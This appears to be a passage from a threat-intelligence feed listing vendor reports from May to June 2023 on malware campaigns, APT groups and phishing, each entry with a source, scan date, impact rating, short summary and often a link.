- Intel Name:
- Supply_Chain_Attackers_Exploiting_New_Technique
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Checkmarx researchers have identified a new attack technique for hijacking S3 buckets by Supply Chain Attackers.
—
- Intel Source:
- CADO Security
- Intel Name:
- An_Emerging_Romanian_Threat_Actor_Named_Diicot
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Cado security researchers have identified an interesting attack pattern that could be attributed to the threat actor Diicot (formerly, “Mexals”).
Source:
https://www.cadosecurity.com/tracking-diicot-an-emerging-romanian-threat-actor/
—
- Intel Source:
- Symantec
- Intel Name:
- Long_Running_Shuckworm_Intrusions_Against_Ukrainian_Organizations
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that the Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments.
—
- Intel Source:
- Netskope
- Intel Name:
- Netskope_DL_based_Inline_Phishing_Detection
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- Netskope Threat Labs have observed ChatGPT facilitates natural language processing and communication, while Netskope’s Inline Phishing Detection focuses on identifying and blocking phishing attacks in real-time.
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- A_New_ChromeLoader_Campaign_Named_Shampoo
- Date of Scan:
- 2023-06-16
- Impact:
- MEDIUM
- Summary:
- HP Wolf Security detects new malware campaign “Shampoo” utilizing malicious ChromeLoader extension. It steals sensitive information, injects ads, and poses challenges for removal.
Source:
https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_group_exploiting_Korean_finance_security_solution_vulnerability
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- The ASEC team have observed Lazarus threat group exploiting new vulnerabilities in VestCert and TCO!Stream. Update software promptly to mitigate risks. Stay informed, strengthen security measures against advanced threats.
—
- Intel Source:
- Trellix
- Intel Name:
- Phishing_Attacks_Using_HTML_Attachments
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- Trellix researchers have identified a phishing attacks using HTML attachments are increasing rapidly, targeting global industries with obfuscation techniques and evasion methods, requiring heightened vigilance and strong email security measures.
—
- Intel Source:
- Microsoft
- Intel Name:
- Introducing_Cadet_Blizzard_as_a_Significant_New_Russian_Threat_Actor
- Date of Scan:
- 2023-06-15
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have updated details about techniques of a threat actor formerly tracked as DEV-0586—a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard.
—
- Intel Source:
- Netscope
- Intel Name:
- The_risks_of_zip_and_mov_domains
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- Sometime ago Google discovered and shared eight new top level domains. Two of them (.zip and .mov) have been a concern because they are similar to well known file extensions. Both .zip and .mov TLD are not new, as they have been available since 2014. The main threat was that anyone now can own a .zip or .mov domain and be taken advantage for social engineering at a cheap price. The threat with the .zip and .mov domains is that attackers will be able to craft URLs that appear to be delivering ZIP and MOV files, but instead will redirect victims to malicious websites.
Source:
https://www.netskope.com/blog/zip-and-mov-top-level-domain-abuse-one-month-after-being-made-public
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_Look_into_Earth_Preta_Hidden_Working
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discussed the more technical details of the most recent tools, techniques, and procedures (TTPs) leveraged by the Earth Preta APT group.
—
- Intel Source:
- Sygnia
- Intel Name:
- Analyzing_a_global_adversary_in_the_middle_campaign
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- In the begining of this year, Sygnia’s IR team was investigating and analyzing about a Business Email Compromise (BEC) attack against one of its clients.The threat actor gained initial access to one of the victim employees’ accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After getting the access, the threat actor exfiltrated data from the compromised account and used his access to spread phishing attacks to other victim’s employees along with several external targeted organizations.
Source:
https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
—
- Intel Source:
- Dr.WEB
- Intel Name:
- Pirated_Windows_10_ISOs_Install_Clipper_Malware
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Dr.WEB researchers have identified that hackers are distributing Windows 10 using torrents that hide cryptocurrency hijackers in the EFI (Extensible Firmware Interface) partition to evade detection.
—
- Intel Source:
- Cyble
- Intel Name:
- WannaCry_Imitator_targets_Russian_Gaming_Community
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Cyble reserachers observed recently some phishing campaigns that use gaming sites as a distribution channel for various malware families. They discovered a phishing campaign targeting Russian-speaking gamers targeting to distribute ransomware. The fake website lets install a file that contains a legitimate game installer and ransomware. The ransomware has used the name “WannaCry 3.0” and utilizes the “wncry” file extension for encrypting files, although it is not a orogonal variant of the WannaCry ransomware. This ransomware is a modified version of an open-source Ransomware “Crypter”, developed for Windows and written purely in Python.
—
- Intel Source:
- Trellix
- Intel Name:
- New_Golang_Based_Skuld_Malware
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Trellix researchers have identified a new Golang-based information stealer called Skuld that has compromised Windows systems across Europe, Southeast Asia, and the US.
—
- Intel Source:
- Sophos
- Intel Name:
- Diving_Deep_into_Pikabot_Cyber_Threat
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- Sophos researchers have identified Pikabot malware, Pikabot is a modular malware trojan acting as a backdoor, allowing unauthorized remote access and executing diverse commands received from a command-and-control server. It has the potential for multi-staged attacks
Source:
https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/
—
- Intel Source:
- Securelist
- Intel Name:
- Multistage_DoubleFinger_loads_GreetingGhoul_stealer
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- Securilist shared their analyses about the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger’s loader stages.
Source:
https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Threats_analyses_May_28_June_3_20
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from May 28th to June 3rd, 2023 and provide statistical information on each type.
—
- Intel Source:
- Elastic
- Intel Name:
- Hackers_Targeting_Vietnamese_Public_Companies_With_SPECTRALVIPER_Backdoor
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Researchers from Elastic have identified an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER which is targeting Vietnamese public companies. It is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities.
Source:
https://www.elastic.co/security-labs/elastic-charms-spectralviper
—
- Intel Source:
- Cyble
- Intel Name:
- Darkrace_Ransomware_Resembles_LockBit_Ransomware
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new ransomware named Darkrace which has similarities with Lockbit Ransomware. It is specifically targeting Windows operating systems and exhibits several similarities to the LockBit ransomware, including the deployment of batch files to terminate processes, the dropping of file icons, and the utilization of random encryption extensions.
Source:
https://blog.cyble.com/2023/06/08/unmasking-the-darkrace-ransomware-gang/
—
- Intel Source:
- Cyble
- Intel Name:
- Malicious_PyPI_Packages
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs analysts have been actively tracking malicious python packages and recently observed different infostealersr, one is dubbed as KEKW that was spreading through multiple malicious python packages, another one was the Creal Stealer, which is an open-source stealer that has been extensively utilized by threat actors. There was no evidence of it being propagated through Python packages. Cyble researches discovered several Python packages that were found to distribute the Creal Stealer. Another ones, The TIKCOCK GRABBER, The Hazard Token Grabber, the W4SP stealer, are type of Information Stealer malwares that focuse on extracting sensitive information from victims’ systems. Cyble’s analysis revealed that InfoStealers, a specific type of malware, was predominantly propagated through malicious Python packages. The presence of readily accessible code for information Stealers on platforms like GitHub has empowered multiple threat actors to leverage this particular strain of malware in their campaigns.
Source:
https://blog.cyble.com/2023/06/09/over-45-thousand-users-fell-victim-to-malicious-pypi-packages/
—
- Intel Source:
- ISC. SANS
- Intel Name:
- Undetected_PowerShell_Backdoor
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- ISC. SANS researcher Xavier Mertens found a script that scored 0/59 on VT. He provided the details on his findings on it. The file was found with the name « Microsoft.PowerShell_profile.ps1 ». The attacker decided to select that name because this is a familiar name used by Microsoft to manage PowerShell profiles.
—
- Intel Source:
- Securelist
- Intel Name:
- Satacom_malware_steals_cryptocurrency
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Securilist shared retheir analyses about recent malware distribution campaign related to the Satacom downloader, also known as LegionLoader, is a renewed malware family that has been around since 2019. The main goal of this malware that is dropped by the Satacom downloader is to steal BTC from the victim’s account by performing web injections into targeted cryptocurrency websites. The malware tries to install an extension for Chromium-based web browsers, which later communicates with its C2 server, whose address is stored in the BTC transaction data.
Source:
https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Activity_of_DShield_Honeypot
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Researchers from SANS have reviewed the DShield honeypot stored the previous month. Also interesting is how the activity varies from week to week.
Source:
https://isc.sans.edu/diary/DShield+Honeypot+Activity+for+May+2023/29932/
—
- Intel Source:
- Obsidian
- Intel Name:
- A_SaaS_ransomware_attack_against_a_Sharepoint_365
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Obsidian’s Threat Research team has observed a SaaS ransomware attack against a company’s Sharepoint Online (Microsoft 365) without using a compromised endpoint. Our team and product were leveraged post-compromise to determine the finer details of the attack.
Source:
https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/
—
- Intel Source:
- DFIR Report
- Intel Name:
- Truebot_Using_Cobalt_Strike_and_FlawedGrace
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- The DFIR Report researchers have identified that Truebot is delivering through a Traffic Distribution System. This campaign, observed in May 2023, leveraged email for the initial delivery mechanism. After clicking through the link in an email, the victim would be redirected through a series of URLs before being presented with a file download at the final landing page.
Source:
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
—
- Intel Source:
- Blackberry
- Intel Name:
- RomCom_Group_Targeting_Politicians_in_Ukraine_and_US_Based_Healthcare
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- Blackberry researchers have observed RomCom targeting politicians in Ukraine who are working closely with Western countries, and a U.S.-based healthcare company providing humanitarian aid to the refugees fleeing from Ukraine and receiving medical assistance in the U.S.
Source:
https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine
—
- Intel Source:
- Cofense
- Intel Name:
- Caffeine_phishing_domains_and_patterns_still_active_despite_store_closure
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Cofense researchers have observed an ongoing and evolving campaign of credential phishing activity has been detected, specifically targeting Microsoft Office 365 credentials. This campaign involves the distribution of fraudulent emails that aim to deceive recipients and trick them into divulging their Office 365 login credentials.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_Details_About_Asylum_Ambuscade_Cybercrime_Group
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Researchers from Welivesecurity have analyzed the Asylum Ambuscade cybercrime group that has been performing cyberespionage operations on the side and provided details about the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.
Source:
https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/
—
- Intel Source:
- Checkpoint
- Intel Name:
- North_African_Espionage_Attacks_Using_Stealth_Soldier_Backdoors
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- Check Point researchers have identified an ongoing operation against targets in North Africa involving a previously undisclosed multi-stage backdoor called Stealth Soldier. The malware Command and Control network is part of a larger set of infrastructure, used at least in part for spear-phishing campaigns against government entities.
—
- Intel Source:
- JPCERT
- Intel Name:
- GobRAT_malware_targeting_Linux_routers
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- JPCERT/CC has shared about attacks that infected routers in Japan with malware around February 2023. Their analyses blog gives the details of the attack confirmed by JPCERT/CC and GobRAT malware, which was used in the attack. Based on JPCERT analyses, the attack vector and target initially was a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT
—
- Intel Source:
- Group-IB
- Intel Name:
- Dark_Pink_APT_Group_Return_With_5_Victims_in_New_Countries
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Group-IB researchers have identified new tools, exfiltration mechanisms, and victims in new industries, in countries that Dark Pink has never targeted before. It has continued to attack government, military, and non-profit organizations in the Asia-Pacific expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium.
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Distributing_Malicious_Job_Application_Letters
- Date of Scan:
- 2023-06-08
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that malware disguised as a job application letter is continuously being distributed. This malware is equipped with a feature that checks for the presence of various antivirus processes.
—
- Intel Source:
- Barracuda
- Intel Name:
- Zero_Day_Flaw_in_Barracuda_Email_Security_Gateway_Appliances
- Date of Scan:
- 2023-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Barracuda have urged their customers who were impacted by a recently disclosed zero-day flaw in its Email Security Gateway (ESG) appliances to immediately replace them.
Source:
https://www.barracuda.com/company/legal/esg-vulnerability
—
- Intel Source:
- Cofense
- Intel Name:
- The_Return_of_Vacation_Request_Phishing_Emails
- Date of Scan:
- 2023-06-08
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign where the threat actor sends an email to a user that claims to be from the ‘HR Department’ and provided the user with a link to submit their annual leave requests.
Source:
https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
—
- Intel Source:
- Lumen
- Intel Name:
- Qakbot_Retool_Reinfect_Recycle
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- Lumen researchers observed recent Qakbot’s campaigns to see insights of their network structure, and gained key insights into the methods that support Qakbot’s reputation as an evasive and tenacious threat.
Source:
https://blog.lumen.com/qakbot-retool-reinfect-recycle/?utm_source=substack&utm_medium=email
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Examination_of_TargetCompany_Ransomware
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified that threat actors behind TargetCompany ransomware clarified that each major update of the ransomware entailed a change in the encryption algorithm and different decryptor characteristics. These are accompanied by a change in file name extensions, hence the evolution of names by which the ransomware group is known.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- ITG10_Group_Targeting_South_Korean_Entities
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- IBM Security researchers have uncovered documents that are most likely part of a phishing campaign mimicking credible senders, orchestrated by a group X-Force refers to as ITG10, and aimed at delivering RokRAT malware.
Source:
https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/
—
- Intel Source:
- Recorded Future
- Intel Name:
- North_Korean_TAG71_Group_Spoofs_Asian_and_US_Financial_Institutions
- Date of Scan:
- 2023-06-07
- Impact:
- MEDIUM
- Summary:
- Recorded Future researchers have discovered malicious cyber threat activity spoofing several financial institutions and venture capital firms in Japan, Vietnam, and the United States. They refer to the group behind this activity as Threat Activity Group 71 (TAG-71). Also, identified 74 domains resolving to 5 IP addresses, as well as 6 malicious files, in the most recent cluster of activity from September 2022 to March 2023.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Korean_Users_via_Malicious_Document_Files
- Date of Scan:
- 2023-06-07
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered an ongoing campaign associated with the notorious ransomware group LockBit. It has once again embraced the approach of disseminating malware through malicious document files targeting Korean individuals. Notably, the group utilized the same template injection techniques to deliver their payload.
Source:
https://blog.cyble.com/2023/06/06/lockbit-ransomware-2-0-resurfaces/
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_Social_Engineering_Campaign_Aims_to_Steal_Credentials_and_Gather_Strategic_Intelligence
- Date of Scan:
- 2023-06-06
- Impact:
- MEDIUM
- Summary:
- SentinelLabs researchers have tracked a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberespionage_Against_Ukrainian_State_Bodies_and_Media
- Date of Scan:
- 2023-06-06
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified that files (.HTA, .EXE, .RAR, .LNK) are distributed by unknown persons using e-mail and instant messengers, the launch of which leads to damage to the victim’s computer by the LONEPAGE malicious program.
—
- Intel Source:
- Akamai
- Intel Name:
- Hackers_Take_Over_Legitimate_Sites_to_Host_Credit_Card_Stealer_Scripts
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- Akamai researchers have observed a new Magecart credit card stealing campaign hijacks legitimate sites to act as “makeshift” command and control (C2) servers to inject and hide the skimmers on targeted eCommerce sites.
Source:
https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
—
- Intel Source:
- Huntress
- Intel Name:
- MOVEit_Transfer_Critical_Vulnerability
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- Researchers from Hunteers have investigated the exploitation of critical MOVEit transfer vulnerability CVE-2023-34362.
Source:
https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
—
- Intel Source:
- Splunk
- Intel Name:
- Detection_and_Analysis_of_RedLine_Stealer
- Date of Scan:
- 2023-06-06
- Impact:
- LOW
- Summary:
- RedLine Stealer is a malware strain designed to steal sensitive information from compromised systems. It is typically distributed through phishing emails, social engineering tactics, and malicious URL links.
—
- Intel Source:
- Perception Point
- Intel Name:
- Diving_Deep_into_Red_Deer
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- Researchers from Perception Point have deeply analyzed a malware campaign crafted specifically for the Israeli audience called Red Deer.
Source:
https://perception-point.io/blog/operation-red-deer/
—
- Intel Source:
- Esentire
- Intel Name:
- Return_of_GuLoader_VBScript_Variant_with_PowerShell_Updates
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- GuLoader is a sophisticated malware loader which has heavily abused tax-themed lures. TRU reported on ongoing GuLoader activity using tax-themed lures and decoy files TRU identified an updated VBScript GuLoader variant across multiple customers.
Source:
https://www.esentire.com/blog/guloader-vbscript-variant-returns-with-powershell-updates
—
- Intel Source:
- VMware
- Intel Name:
- Detection_of_Carbon_Black_TrueBot_Malware
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- VMware’s Carbon Black Managed Detection and Response (MDR) team began seeing a surge of TrueBot activity. TrueBot is under active development by Silence, with recent versions using a Netwrix vulnerability for delivery.
Source:
https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html
—
- Intel Source:
- Menlo Security
- Intel Name:
- Analysis_of_XeGroups_Attack_Techniques_Detected
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- XeGroup’s tactics, techniques, and procedures have been detailed in a report by Volexity, which suggests that the group may be associated with other cybercriminal organizations and may have links to state-sponsored hacking groups.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Chinese_Hackers_Using_Modified_Cobalt_Strike_Variant_to_Attack_Taiwanese_Critical_Infrastructure
- Date of Scan:
- 2023-06-05
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have identified a malicious web server very likely operated by a Chinese threat actor used to target Taiwanese government entities, including critical infrastructure
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Camaro_Dragon_Strikes_with_a_New_TinyNote_Backdoor
- Date of Scan:
- 2023-06-03
- Impact:
- LOW
- Summary:
- Checkpoint researchers have observed that a Chinese nation-stage group known as Camaro Dragon has been linked to yet another backdoor that’s designed to meet its intelligence-gathering goals.
Source:
https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/
—
- Intel Source:
- Symantec
- Intel Name:
- Lancefly_APT_Targets_Governments_Aviation_and_Organizations_with_Custom_Backdoors
- Date of Scan:
- 2023-06-03
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified that Lancefly APT goup has been using custom backdoors for several years to target organizations in South and Southeast Asia.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Who_and_What_Threatens_the_World_Column_exe_malware
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- The ReversingLabs research team has identified a novel attack on PyPI using compiled Python code to evade detection possibly the first attack to take advantage of PYC file direct execution.
—
- Intel Source:
- Talos
- Intel Name:
- New_unidentified_botnet_campaign_Horabot
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- Cisco Talos researchers have identified that unidentified botnet program Talos is calling “Horabot,” which delivers a known banking trojan and spam tool onto victim machines in a campaign.
Source:
https://blog.talosintelligence.com/new-horabot-targets-americas/
—
- Intel Source:
- Securelist
- Intel Name:
- Previously_unknown_malware_attacked_IOS_devices
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- During of monitoring the network traffic of Securelist corporate Wi-Fi network, the researchers observed suspicious activity that originated from several iOS-based phones. Beucase it was impossible to inspect modern iOS devices from the inside, the researchers created offline backups of the devices in question, inspected them using the Mobile Verification Toolkit’s mvt-ios and discovered traces of compromise. The called this campaign “Operation Triangulation”.
Source:
https://securelist.com/operation-triangulation/109842/
—
- Intel Source:
- Blackberry
- Intel Name:
- Operation_CMDStealer
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- BlackBerry researchers have identified an unknown financially motivated threat actor, very likely from Brazil, is targeting Spanish- and Portuguese-speaking victims, with the goal of stealing online banking access. The victims are primarily in Portugal, Mexico, and Peru. This threat actor employs tactics such as LOLBaS (Living Off the Land Binaries and Scripts), along with CMD-based scripts to carry out its malicious activities.
Source:
https://blogs.blackberry.com/en/2023/05/cmdstealer-targets-portugal-peru-and-mexico
—
- Intel Source:
- Sentinelone
- Intel Name:
- Operation_Magalenha
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- SentinelLabs has been tracking a campaign over the rst quarter of 2023 targeting users of Portuguese nancial institutions, including government, government-backed, and private institutions.
—
- Intel Source:
- Cyble
- Intel Name:
- SharpPanda_APT_Campaign_Expands
- Date of Scan:
- 2023-06-02
- Impact:
- LOW
- Summary:
- Cyble reserachers observed an ongoing campaign by SharpPanda APT. Before, this APT group has a history of targeting government officials, particularly in Southeast Asian countries. This latest campaign specifically targets high-level government officials from G20 nations.
Source:
https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_Malware_Disguised_as_Hancom_Office_Document_File_Detected
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware disguised as Hancom Office document files. The malware that is being distributed is named “Who and What Threatens the World (Column).exe” and is designed to deceive users by using an icon that is similar to that of Hancom Office.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- The_attacks_against_Apache_NiFi
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- On May 19th, Johannes Ullrich, ISC SANS analyst noted a rapid increase in requests like: Attacks Against Apache NiFi. Apache NiFi describes itself as “an easy-to-use, powerful, and reliable system to process and distribute data. For sure one actor is actively scanning the Internet for unprotected instances of Apache NiFi. That threat actor will add processors in Apache NiFi to either istall a crypto coin miner and then to perform lateral movement by searching the server for SSH credentials.
—
- Intel Source:
- AT&T
- Intel Name:
- A_new_Quasar_variant_SeroXen_RAT
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- AT&T Alien Labs researchers reviewed recent malicious samples, a new Quasar variant which was observed by Alien Labs in the wild -SeroXen. This new RAT is a modified branch of the open-source version, adding some modifications features to the original RAT.
Source:
https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale
—
- Intel Source:
- Cleafy
- Intel Name:
- The_deeper_techniques_of_sLoad_Ramnit_and_drIBAN
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Cleafy analysts shared in their blog the deeper techniques that that made them connect sLoad, Ramnit, and drIBAN malwares. The analysts provided some Ramnit characteristics and the techniques used to perform the MiTB attack and deliver its injection kit.
Source:
https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter-2
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_connections_between_BlackSuit_and_Royal_ransomware
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro analyzed BlackSuit ransomware and how it compares to Royal Ransomware. Several researchers on Twitter discovered a new ransomware family called BlackSuit that targeted both Windows and Linux users. Some Twitter posts also mentioned connections between BlackSuit and Royal, which triggered Trendmicro reserchers interest. Trendmicro researchers shared in their blog the analyses of a Windows 32-bit sample of the ransomware from Twitter.
—
- Intel Source:
- Eclypsium
- Intel Name:
- Gigabyte_App_Center_Backdoor_risk
- Date of Scan:
- 2023-06-01
- Impact:
- LOW
- Summary:
- Recently, the Eclypsium platform observed some suspicious backdoor behavior inside of Gigabyte systems. Their detectors detected new previously-unknown supply chain threats, where legitimate third-party technology products or updates have been compromised. The Eclypsium analysis discovered that firmware in Gigabyte systems is dropping and executing a Windows native executable file during the system startup process, and this executable one then downloads and executes additional payloads insecurely. It uses the same techniques as other OEM backdoor-like features like Computrace backdoor (a.k.a. LoJack DoubleAgent) abused by threat actors and even firmware implants such as Sednit LoJax, MosaicRegressor, Vector-EDK.
Source:
https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- AceCryptor_cruptor_operation
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- ESET researchers shared details about a widespreaded cryptor, operating as a cryptor-as-a-service used by tens of malware families.
Source:
https://www.welivesecurity.com/2023/05/25/shedding-light-acecryptor-operation/
—
- Intel Source:
- ISC. SANS
- Intel Name:
- DocuSign_email_opens_to_script_based_infection
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- SomeTwitter user @0xToxin has discovered malicious emails imitating DocuSign with HTML attachments recently.
—
- Intel Source:
- Intezer
- Intel Name:
- CryptoClippy_actively_expanding_its_capabilities
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- Intezer analysts shared the details of the indication that the threat actors behind CryptoClippy are actively expanding its capabilities, now targeting a broader range of payment services commonly used in Brazil.
Source:
https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/
—
- Intel Source:
- Inky
- Intel Name:
- ChatGPT_safisticated_Phishing_Scam
- Date of Scan:
- 2023-05-31
- Impact:
- LOW
- Summary:
- The Inky reserachers observed that cybercriminals have begun impersonating the brand in a sophisticated personalized phishing campaign ChatGPT whose impersonation fuels a Clever Phishing Scam.
Source:
https://www.inky.com/en/blog/fresh-phish-chatgpt-impersonation-fuels-a-clever-phishing-scam
—
- Intel Source:
- Cyble
- Intel Name:
- Ducktail_Malware_targets_a_high_profile_accounts
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Recently Cyble researchers recently discovered Ducktail malware that targets specifically Marketing and HR professionals. The malware is designed to extract browser cookies and take advantage of social media sessions to steal sensitive information from the victim’s Social Media account. The malware operation purpose is to gain control of Social Media Business accounts with adequate access privileges. TAs then use their acquired access to conduct advertisements for their financial gain.
—
- Intel Source:
- NSA / Secureworks
- Intel Name:
- Chinese_APT_Group_BRONZE_SILHOUETTE_Targeting_US_Government_and_Defense_Organizations
- Date of Scan:
- 2023-05-30
- Impact:
- MEDIUM
- Summary:
- SecureWorks researchers have discovered a cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
—
- Intel Source:
- Cyble
- Intel Name:
- The_Invicta_Stealer_Spreading
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Cyble researcher Lab team discovered a new stealer called Invicta Stealer. The developer who is in charge of this malware is heavy involved on social media platforms, utilizing them to promote their information stealer and its lethal capabilities.
Source:
https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/
—
- Intel Source:
- Cyble
- Intel Name:
- Obsidian_ORB_Ransomware_Demanding_Payment_With_Gift_Cards
- Date of Scan:
- 2023-05-30
- Impact:
- LOW
- Summary:
- Cyble researchers have come across a new and unique ransomware strain named Obsidian ORB. Extensive analysis has revealed compelling evidence that suggests a significant correlation between Obsidian ORB Ransomware and the underlying source code of the notorious Chaos ransomware.
Source:
https://blog.cyble.com/2023/05/25/obsidian-orb-ransomware-demands-gift-cards-as-payment/
—
- Intel Source:
- Sentinelone
- Intel Name:
- Hackers_Targeting_Users_of_Portuguese_Financial_Institutions
- Date of Scan:
- 2023-05-29
- Impact:
- MEDIUM
- Summary:
